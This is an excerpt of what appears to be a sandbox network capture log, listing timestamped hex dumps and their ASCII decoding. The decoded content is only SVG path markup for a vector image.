                                                                                                                                                                              2023-09-15 05:27:28 UTC2068INData Raw: 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 31 2e 37 31 2c 32 35 39 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e
                                                                                                                                                                              Data Ascii: h class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M521.71,259.58a1.91,1.91,0,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.
                                                                                                                                                                              2023-09-15 05:27:28 UTC2084INData Raw: 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                              Data Ascii: 2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path c
                                                                                                                                                                              2023-09-15 05:27:28 UTC2100INData Raw: 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 33 33 2c 32 35 30 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31
                                                                                                                                                                              Data Ascii: 8,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M576.33,250a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1
                                                                                                                                                                              2023-09-15 05:27:28 UTC2116INData Raw: 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                              Data Ascii: 1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path
                                                                                                                                                                              2023-09-15 05:27:28 UTC2132INData Raw: 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2e 32 31 2c 32 34 38 2e 31 35 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 33 31 2c 32 34 30 2e 34 33 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c
                                                                                                                                                                              Data Ascii: lass="cls-7" d="M631.21,248.15a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.17"></path><path class="cls-7" d="M631,240.43a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.67,2.67,0,0,
                                                                                                                                                                              2023-09-15 05:27:28 UTC2148INData Raw: 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 35 30 2e 38 31 2c 31 33 31 2e 36 31 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                              Data Ascii: .05,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M650.81,131.61a1.92,1.92,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.34,2.34,0,0,1,.18,3.17"></path><path c
                                                                                                                                                                              2023-09-15 05:27:28 UTC2164INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 38 33 2c 32 33 38 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 36 38 35 2e 35 37 2c 32 33 30 2e 38 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e
                                                                                                                                                                              Data Ascii: <path class="cls-7" d="M685.83,238.58a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M685.57,230.86a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.
                                                                                                                                                                              2023-09-15 05:27:28 UTC2180INData Raw: 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 30 35 2e 34 33 2c 31 32 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                              Data Ascii: .66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class="cls-7" d="M705.43,122a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.37,2.37,0,0,1,.18,3.18"></path><path class
                                                                                                                                                                              2023-09-15 05:27:28 UTC2196INData Raw: 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 31 39 2c 32 32 31 2e 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e
                                                                                                                                                                              Data Ascii: 40.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M740.19,221.29a1.92,1.92,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.
                                                                                                                                                                              2023-09-15 05:27:28 UTC2212INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 35 39 2e 37 39 2c 31 30 34
                                                                                                                                                                              Data Ascii: 2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M759.79,104
                                                                                                                                                                              2023-09-15 05:27:28 UTC2228INData Raw: 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 32 33 2c 33 37 32 2e 34 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e
                                                                                                                                                                              Data Ascii: M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M661.23,372.45a2.16,2.16,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.
                                                                                                                                                                              2023-09-15 05:27:28 UTC2244INData Raw: 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 39 2c 32 32 35 2e 31 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                              Data Ascii: 233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M689,225.13a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.
                                                                                                                                                                              2023-09-15 05:27:28 UTC2260INData Raw: 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73
                                                                                                                                                                              Data Ascii: -4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path clas
                                                                                                                                                                              2023-09-15 05:27:28 UTC2276INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 39 33 2c 34 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30
                                                                                                                                                                              Data Ascii: ,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M757.93,408a2.15,2.15,0,0
                                                                                                                                                                              2023-09-15 05:27:28 UTC2292INData Raw: 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                              Data Ascii: 1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                              2023-09-15 05:27:28 UTC2308INData Raw: 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 31 33 2c 33 35 36 2e 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c
                                                                                                                                                                              Data Ascii: M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M820.13,356.5a2.16,2.16,0,0,1-1.1,2.76,3.16,3.16,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,
                                                                                                                                                                              2023-09-15 05:27:28 UTC2324INData Raw: 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                              Data Ascii: 2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58
